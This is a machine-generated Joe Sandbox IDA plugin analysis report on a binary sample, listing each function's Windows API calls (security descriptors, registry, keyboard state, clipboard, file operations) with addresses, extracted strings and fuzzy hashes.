                                          • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                          • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                                          • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                                          • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED825B
                                        • _memset.LIBCMT ref: 00ED8270
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED828F
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED82A0
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ED82DD
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED82F9
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED8316
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8325
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED832C
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED834D
                                        • CopySid.ADVAPI32(00000000), ref: 00ED8354
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8385
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED83AB
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED83BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                                        • Instruction ID: 9414c21bcd9fa2c9b6b5b96aa5e4b06dc1a48678a22cbeddd2bbb7c57143f78a
                                        • Opcode Fuzzy Hash: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                                        • Instruction Fuzzy Hash: 4B616971900209EFDF10DFA4DE84AEEBBB9FF04704F04912AF815A7291DB319A16DB60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                                        • API String ID: 0-3700951917
                                        • Opcode ID: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                                        • Instruction ID: 1db81ab4cd0d43b9d0997f85861f5d7bd71801817620ae5a6c55e9ba25a90b6d
                                        • Opcode Fuzzy Hash: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                                        • Instruction Fuzzy Hash: 54727E71E002199BDF24DF58C8907EEB7B5EF48314F1491ABE859BB390E7709982DB90
                                        APIs
                                          • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00737
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F007D6
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0086E
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F00AAD
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F00ABA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: a4b268423962a7d0ad04adb83238215c03bb6545955605c4dd4b55af925885d5
                                        • Instruction ID: 91dd678b5ce5a73f3ff8a480b5c5aa67c0ca799995472d8f1a92c2b00cead838
                                        • Opcode Fuzzy Hash: a4b268423962a7d0ad04adb83238215c03bb6545955605c4dd4b55af925885d5
                                        • Instruction Fuzzy Hash: AAE13C31604214AFCB14DF28C895E6ABBE4FF89714F04856DF88ADB2A2DB34E905DB51
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00EE0241
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EE02C2
                                        • GetKeyState.USER32(000000A0), ref: 00EE02DD
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EE02F7
                                        • GetKeyState.USER32(000000A1), ref: 00EE030C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00EE0324
                                        • GetKeyState.USER32(00000011), ref: 00EE0336
                                        • GetAsyncKeyState.USER32(00000012), ref: 00EE034E
                                        • GetKeyState.USER32(00000012), ref: 00EE0360
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EE0378
                                        • GetKeyState.USER32(0000005B), ref: 00EE038A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                                        • Instruction ID: cd5002eac4439d976467b8f996c4e8fb5c1577e3aeee3fc84e842701b64e6e13
                                        • Opcode Fuzzy Hash: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                                        • Instruction Fuzzy Hash: D741EB246047CE6EFF318AA598083B5BFE07F16358F08509DD6C6665C3EBE459C887A2
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CoInitialize.OLE32 ref: 00EF8718
                                        • CoUninitialize.COMBASE ref: 00EF8723
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,00F12BEC,?), ref: 00EF8783
                                        • IIDFromString.COMBASE(?,?), ref: 00EF87F6
                                        • VariantInit.OLEAUT32(?), ref: 00EF8890
                                        • VariantClear.OLEAUT32(?), ref: 00EF88F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: 9670dcfa4a4aee9ca631c8108e2493be445cebc685b3b9a5cd113bce66453ef0
                                        • Instruction ID: 18a478ec11c630515662bffe60ae04166ed01c36d1812186755fad2571f6542f
                                        • Opcode Fuzzy Hash: 9670dcfa4a4aee9ca631c8108e2493be445cebc685b3b9a5cd113bce66453ef0
                                        • Instruction Fuzzy Hash: DE61D3316083059FC714EF24CA44BABB7E4EF48754F54581EFA85AB291DB70ED48CB92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                                        • Instruction ID: b35b9333c9ec4a3a6078fc45112f91079567eed8118c29c02fd47c05a4ab3bb6
                                        • Opcode Fuzzy Hash: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                                        • Instruction Fuzzy Hash: 5621D3757002189FDB20AF60EC49B7A77A8FF44310F14806AF94AEB2A1CB71AD01DB84
                                        APIs
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                          • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EE3ADF
                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EE3B87
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE3B9A
                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EE3BB7
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE3BD9
                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EE3BF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 4002782344-1173974218
                                        • Opcode ID: 03c936f42c9897c66d8af365fed89874f113fe5b649f5515eaf853289f22e756
                                        • Instruction ID: ae11ba7af1d8566074a8fceec67a6d1218091ceb27348e84b3055bf209127c01
                                        • Opcode Fuzzy Hash: 03c936f42c9897c66d8af365fed89874f113fe5b649f5515eaf853289f22e756
                                        • Instruction Fuzzy Hash: 1951803180118D9ACF15FBA1CD968EDB7F9AF14304F6461A9E44A77091EF31AF09CB60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-3486589167
                                        • Opcode ID: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                                        • Instruction ID: 3308973111c27fdcd1f664ef7c8b95fac6bd0280303e2f4d3fdc9f6625b59e15
                                        • Opcode Fuzzy Hash: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                                        • Instruction Fuzzy Hash: 82A260B1E0421ACBDF24CF58CA90BEDB7B1BB54318F1491AAD856B7280D7719E82DF50
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EEF6AB
                                        • Sleep.KERNEL32(0000000A), ref: 00EEF6DB
                                        • _wcscmp.LIBCMT ref: 00EEF6EF
                                        • _wcscmp.LIBCMT ref: 00EEF70A
                                        • FindNextFileW.KERNEL32(?,?), ref: 00EEF7A8
                                        • FindClose.KERNEL32(00000000), ref: 00EEF7BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        • Opcode ID: 3785e304427d3ae45d5d2958cc13d314c2d81dd59e3d238e249dbc718ee54943
                                        • Instruction ID: 7aa4757ab95f9abd754a1586b545cb53b3faf5efd3b72e14059bd29cede156cc
                                        • Opcode Fuzzy Hash: 3785e304427d3ae45d5d2958cc13d314c2d81dd59e3d238e249dbc718ee54943
                                        • Instruction Fuzzy Hash: 8941907191024E9FCF21EF65CC85AEEBBB4FF05314F145566E819B21A0EB309E44CB90
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetSystemMetrics.USER32(0000000F), ref: 00F0D78A
                                        • GetSystemMetrics.USER32(0000000F), ref: 00F0D7AA
                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F0D9E5
                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F0DA03
                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F0DA24
                                        • ShowWindow.USER32(00000003,00000000), ref: 00F0DA43
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0DA68
                                        • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F0DA8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                        • String ID:
                                        • API String ID: 830902736-0
                                        • Opcode ID: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                                        • Instruction ID: 51639e4566f729c2a027cc1b446f715b02dd0115b0e01ae80c319afbba017f78
                                        • Opcode Fuzzy Hash: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                                        • Instruction Fuzzy Hash: 63B19A75A00229EFDF14CFA8C9857BE7BB1FF44711F088069EC489B296D734A950EB50
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EDEB19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                        • API String ID: 1659193697-2318614619
                                        • Opcode ID: 1460abaf4b77bef9295a75e22f83f500f2fe302895e2286b0a321aba434a1c84
                                        • Instruction ID: 2cc4d626cbd1ff49bf5ecb817adbf18b96876471cbe230e66dd6d722dd2b69c9
                                        • Opcode Fuzzy Hash: 1460abaf4b77bef9295a75e22f83f500f2fe302895e2286b0a321aba434a1c84
                                        • Instruction Fuzzy Hash: A0323675A007059FC728DF19C485AAAB7F1FF48320B15D56EE89AEB3A1D770E942CB40
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 9d645d9095eecd6a655e023978844de5f15ee8e55098361815282c49c88218ad
                                        • Instruction ID: 846295bf83007c9bba8f6abfd9f0893a974e748492d86db98fd4f5e599d7fd5a
                                        • Opcode Fuzzy Hash: 9d645d9095eecd6a655e023978844de5f15ee8e55098361815282c49c88218ad
                                        • Instruction Fuzzy Hash: 42128971A00609EFDF14DFA4D981AEEB3F5FF48300F14956AE84AB7291EB35A911CB50
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • _memmove.LIBCMT ref: 00ED062F
                                        • _memmove.LIBCMT ref: 00ED0744
                                        • _memmove.LIBCMT ref: 00ED07EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID: yZ
                                        • API String ID: 1300846289-3798167742
                                        • Opcode ID: 1c092f66e7fad43ead9fa4f58b89ff99af158b2c1368e17fcd47e8c32996dd7e
                                        • Instruction ID: 0399b62fc9b5958d6d6cb70f0d2705b11e2f8a21d53ee3d3e90e6646d7676d6a
                                        • Opcode Fuzzy Hash: 1c092f66e7fad43ead9fa4f58b89ff99af158b2c1368e17fcd47e8c32996dd7e
                                        • Instruction Fuzzy Hash: 63027071A00209DBDF15DF64D9816AE7BF5EF44300F1490AAE80AEB355EB31DA51CB91
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • ReleaseCapture.USER32 ref: 00F0C2F0
                                        • SetWindowTextW.USER32(?,00000000), ref: 00F0C39A
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F0C3AD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F0C48F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 973565025-2107944366
                                        • Opcode ID: f0fdf4825f17525dd1f5c02b6d077dc1a74ab5a259b08df7d49041d39ab556cb
                                        • Instruction ID: 782e2b259bb9726649a1adea7b9ff8f4f69f0cbe12c0de930b767c448534f95e
                                        • Opcode Fuzzy Hash: f0fdf4825f17525dd1f5c02b6d077dc1a74ab5a259b08df7d49041d39ab556cb
